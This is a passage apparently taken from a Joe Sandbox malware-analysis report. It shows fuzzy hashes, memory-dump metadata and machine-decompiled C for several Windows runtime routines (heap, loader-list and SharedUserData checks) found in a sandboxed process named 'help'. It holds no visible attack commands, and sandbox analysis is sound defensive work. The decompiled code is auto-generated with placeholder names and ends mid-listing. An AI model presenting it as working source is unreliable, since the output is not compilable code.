0x0385429c
0x038542dc
0x038542dc
0x038542e3
0x03854309
0x038542e5
0x038542e5
0x038542e8
0x038542ee
0x038542f0
0x00000000
0x038542f2
0x038542f2
0x038542f4
0x038542f7
0x038542f9
0x03854300
0x03854300
0x038542f0
0x0385430e
0x0385431f

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526836517e619e842d357cf3e95f3e4f8566fbd7acd7577abcfdc2d10300ab5e
Instruction ID: eb418bb0ea00408afe22a9892c5691f015bbd837ee004cde360146422e86875e
Opcode Fuzzy Hash: 526836517e619e842d357cf3e95f3e4f8566fbd7acd7577abcfdc2d10300ab5e
Instruction Fuzzy Hash: 4D215B74500B56CFC725EFA9D000A54BBF9FB85319B6482EEE529CF298EB31D482CB45

Uniqueness

Uniqueness Score: -1.00%

Function 037F2397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E037F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x38b848c != 0) {
					L037EFAD0(0x38b8610);
					if( *0x38b848c == 0) {
						E037EFA00(0x38b8610, _t19, _t27, 0x38b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E037F2581(0x38b8610, 0x37a50a0, _t26, _t27, _t28);
						E037EFA00(0x38b8610, 0x37a50a0, _t27, 0x38b8610);
					}
				} else {
					L1:
					_t11 =  *0x38b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03804886(0x37a1088, 1, 0x38b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E037F2581(0x38b8610, (_t11 << 4) + 0x37a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x037f23b0
0x037f23b6
0x037f2409
0x037f2415
0x03835ae9
0x00000000
0x037f241b
0x037f241b
0x037f241d
0x037f2427
0x037f242e
0x037f2430
0x037f2430
0x037f23b8
0x037f23b8
0x037f23b8
0x037f23bf
0x037f23fc
0x037f23fc
0x037f23c1
0x037f23c3
0x037f23d0
0x037f23d8
0x037f23d8
0x037f23dc
0x037f23de
0x037f23e1
0x037f23e1
0x037f23ec

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ee29bba09bd0e2a2d53cb2c10606586b63ba08b342b8e1f4a71ae7d53a584d
Instruction ID: aaa8f9320a3283434312f6f0c39ad0280d679e5fe835b19c82e15a699cd9572d
Opcode Fuzzy Hash: b9ee29bba09bd0e2a2d53cb2c10606586b63ba08b342b8e1f4a71ae7d53a584d
Instruction Fuzzy Hash: 2C114875600B446FE620E6799C84B26B39DFF95620F1848A6E702DF382DAB0D8009654

Uniqueness

Uniqueness Score: -1.00%

Function 038446A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E038446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0380F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E037FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L037E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x038446b7
0x038446ba
0x038446c5
0x038446c8
0x038446d0
0x038446d4
0x038446e6
0x038446e9
0x038446f4
0x038446ff
0x03844705
0x03844706
0x0384470c
0x03844713
0x0384471b
0x03844723
0x03844725
0x038446d6
0x038446d9
0x038446db
0x038446db
0x03844732

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 9ffafb88391722ba500e281df4e73f839b4831a058870b0fcf86898703a82a74
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 87110276504208BBCB15DFAD98809BEB7B9EF89300F1080AAF944CB350DA318D51D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 038037F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E038037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E037E2280(_t6, 0x38b8550);
				}
				_t29 = E0380387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E037DFFB0(0x38b8550, _t27, 0x38b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x038037fa
0x038037fc
0x03803805
0x03803808
0x03803808
0x03803814
0x03803818
0x03803846
0x03803848
0x0380384b
0x0380384b
0x03803852
0x00000000
0x03803854
0x03803856
0x00000000
0x00000000
0x03803863
0x00000000
0x03803863
0x0380381a
0x0380381a
0x0380381f
0x0380386e
0x0380386e
0x03803871
0x03803873
0x03803873
0x03803868
0x00000000
0x03803868
0x03803821
0x03803826
0x00000000
0x00000000
0x03803828
0x0380382a
0x03803841
0x00000000
0x03803841

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31350f1f037fd36802ccf006d9752ef495df1a04234ae3f6906aed9b6dbad78f
Instruction ID: 9aeee41274d82e55b25b291fcadd315148c20e5d3339537d934a7d422bb81c5a
Opcode Fuzzy Hash: 31350f1f037fd36802ccf006d9752ef495df1a04234ae3f6906aed9b6dbad78f
Instruction Fuzzy Hash: 9E01267AA016109BC37BCB999D80E26BBAADF85B5071940EDE805CF390DB70C800C780

Uniqueness

Uniqueness Score: -1.00%

Function 037CC962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E037CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x38bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E037DEEF0(0x38b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0384F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E037DEB70(_t29, 0x38b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0380B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0384F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x38b70c0; // 0x0
					while(_t38 != 0x38b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x38bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x037cc96a
0x037cc974
0x037cc988
0x037cc98a
0x03837c9d
0x03837c9f
0x03837ca4
0x03837cae
0x03837cf0
0x03837cf5
0x03837cfa
0x037cc992
0x037cc996
0x037cc997
0x037cc998
0x037cc9a3
0x037cc9a3
0x03837cb0
0x03837cb7
0x03837cbb
0x00000000
0x00000000
0x03837cbd
0x03837ce8
0x03837cc5
0x03837cc8
0x03837cca
0x03837cd0
0x03837cd6
0x03837cde
0x03837ce4
0x03837ce4
0x03837cd0
0x00000000
0x03837ce8
0x037cc990
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8f372580ce2e148f3355902fa9a4e0796b2a8e982073901b82a2a7001c74b5
Instruction ID: 3ae77c54c17fdba9425b38c23a482b1d26b9a93221d7268f76d095cf23212085
Opcode Fuzzy Hash: 9f8f372580ce2e148f3355902fa9a4e0796b2a8e982073901b82a2a7001c74b5
Instruction Fuzzy Hash: 3311C2313007469BC711EFA8CC4596AB7B5BF85610B0405A9F945C7B51EB20EC16D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 037F002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E037E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E037E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E037E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E037E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x037f0032
0x037f0037
0x037f0043
0x03834b3a
0x037f0049
0x037f0049
0x037f0049
0x037f004e
0x037f0053
0x03834b48
0x03834b5a
0x03834b4a
0x03834b53
0x03834b53
0x03834b5f
0x00000000
0x03834b61
0x00000000
0x03834b61
0x037f0059
0x037f0059
0x037f0060
0x03834b6f
0x03834b6f
0x037f0069
0x03834b83
0x00000000
0x00000000
0x03834b90
0x03834b9b
0x03834b9b
0x03834ba4
0x00000000
0x00000000
0x03834baa
0x00000000
0x037f006f
0x037f006f
0x00000000
0x037f006f
0x037f0069

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: e02239ee485646ea8389c5cdb9e8f9bc6184e39e14af43f6d10e495aa1c8318e
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 99118B366056C9CFD722DBEAD948B357798BB46754F0D00E0DE04DB7A2E738D841C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 037D766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E037D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E037FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E037FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L037E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x037d7672
0x037d767f
0x037d7689
0x037d76de
0x037d76de
0x037d768b
0x037d7691
0x037d7693
0x037d7697
0x00000000
0x037d7699
0x037d76a8
0x00000000
0x037d76aa
0x037d76ad
0x037d76b1
0x00000000
0x037d76b3
0x037d76b3
0x037d76b5
0x037d76ba
0x037d76bc
0x037d76bc
0x037d76c0
0x00000000
0x037d76c2
0x037d76ce
0x037d76ce
0x037d76c0
0x037d76b1
0x037d76a8
0x037d7697
0x037d76d9

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: ee89b99af7b6d9e5b07c37f708259883c6fa7a18c4dd284072730be28aff6247
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 99018432700259AFC724DE5ECC85F5BB7BDEB84A60B280529B908CF250EA30DD1197A0

Uniqueness

Uniqueness Score: -1.00%

Function 0385C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0385C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03809910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E038095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E038095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E038095D0();
				return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0385c458
0x0385c45d
0x0385c466
0x0385c468
0x0385c469
0x0385c46a
0x0385c46b
0x0385c46e
0x0385c46f
0x0385c471
0x0385c476
0x0385c476
0x0385c47c
0x0385c47e
0x0385c480
0x0385c480
0x0385c483
0x0385c484
0x0385c486
0x0385c488
0x0385c48f
0x0385c491
0x0385c493
0x0385c493
0x0385c48f
0x0385c498
0x0385c49e
0x0385c4ad
0x0385c4ad
0x0385c4b2
0x0385c4b4
0x0385c4cd

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: e2dcb3e0349f8e84c5c7642b8b70f2c0d8d17085679346818840afa0f093264e
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 1101DE76140705BFD725EFA9CC80E62FB7EFF44391F044129F2048A5B0CB22ACA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 037C9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E037C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x38b85ec;
				E037E2280(_t48, 0x38b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E037DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x38b538c; // 0x77de6848
					if( *_t84 != 0x38b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x389f6e8);
						E0381D0E8(0x38b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E038988F5(_t80, _t85, 0x38b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x38b86c0; // 0x31d07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x38b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E037E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E038988F5(0x38b85ec, _t85, 0x38b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0380AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x38bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x38b84c0;
																			if(_t82 >=  *0x38b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03899063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E037C922A(_t99);
										_t64 = E037E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03898B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x38b86c0; // 0x31d07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x38b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x38b86bc;
													_t87 = 0x38b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E037C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x38b86c4;
												_t87 = 0x38b86c0;
												L27:
												E037F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0381D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x38b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x38b538c = _t51;
						goto L6;
					}
				}
			}

0x037c9082
0x037c9083
0x037c9084
0x037c9085
0x037c9087
0x037c9096
0x037c9098
0x037c9098
0x037c909e
0x037c90a8
0x037c90e7
0x037c90e7
0x037c90aa
0x037c90b0
0x037c90b7
0x037c90bd
0x037c90dd
0x037c90e6
0x037c90bf
0x037c90bf
0x037c90c7
0x037c90cf
0x037c90f1
0x037c90f2
0x037c90f4
0x037c90f5
0x037c90f6
0x037c90f7
0x037c90f8
0x037c90f9
0x037c90fa
0x037c90fb
0x037c90fc
0x037c90fd
0x037c90fe
0x037c90ff
0x037c9100
0x037c9102
0x037c9107
0x037c910c
0x037c9110
0x037c9113
0x037c9115
0x037c9136
0x037c913f
0x037c9143
0x038237e4
0x038237e4
0x037c9117
0x037c9117
0x037c911d
0x00000000
0x037c911f
0x037c911f
0x037c9125
0x00000000
0x037c9127
0x037c912d
0x037c9130
0x037c9134
0x037c9158
0x037c915d
0x037c9161
0x037c9168
0x03823715
0x037c916e
0x037c916e
0x037c9175
0x037c9177
0x037c917e
0x037c917f
0x037c9182
0x037c9182
0x037c9187
0x037c9187
0x037c918a
0x037c918d
0x037c918f
0x037c9192
0x037c9195
0x037c9198
0x037c9198
0x037c9198
0x037c919a
0x00000000
0x00000000
0x0382371f
0x03823721
0x03823727
0x0382372f
0x03823733
0x03823735
0x03823738
0x0382373b
0x0382373d
0x03823740
0x00000000
0x03823746
0x03823746
0x03823749
0x00000000
0x0382374f
0x0382374f
0x03823751
0x03823757
0x03823759
0x0382375c
0x0382375c
0x0382375e
0x0382375e
0x03823761
0x03823764
0x00000000
0x00000000
0x03823766
0x03823768
0x038237a3
0x038237a3
0x038237a5
0x038237a7
0x038237ad
0x038237b0
0x038237b2
0x038237bc
0x038237c2
0x038237c2
0x038237b2
0x037c9187
0x037c9187
0x037c918a
0x037c918d
0x037c918f
0x037c9192
0x037c9195
0x00000000
0x037c9195
0x00000000
0x0382376a
0x0382376a
0x0382376a
0x0382376c
0x0382376c
0x0382376f
0x03823775
0x00000000
0x00000000
0x03823777
0x03823779
0x03823782
0x03823787
0x03823789
0x03823790
0x03823790
0x0382378b
0x0382378b
0x0382378b
0x03823792
0x03823795
0x00000000
0x03823795
0x00000000
0x03823779
0x03823798
0x00000000
0x03823798
0x00000000
0x03823768
0x0382379b
0x0382379b
0x03823751
0x03823749
0x00000000
0x03823740
0x037c91a0
0x037c91a3
0x037c91a9
0x037c91b0
0x00000000
0x037c91b0
0x037c9187
0x037c91b4
0x037c91b4
0x037c91bb
0x037c91c0
0x037c91c5
0x037c91c7
0x038237da
0x037c91cd
0x037c91cd
0x037c91cd
0x037c91d2
0x037c91d5
0x037c9239
0x037c9239
0x037c91d7
0x037c91db
0x037c91e1
0x037c91e7
0x037c91fd
0x037c9203
0x037c921e
0x037c9223
0x00000000
0x037c9205
0x037c9205
0x037c9208
0x037c920c
0x037c9214
0x037c9214
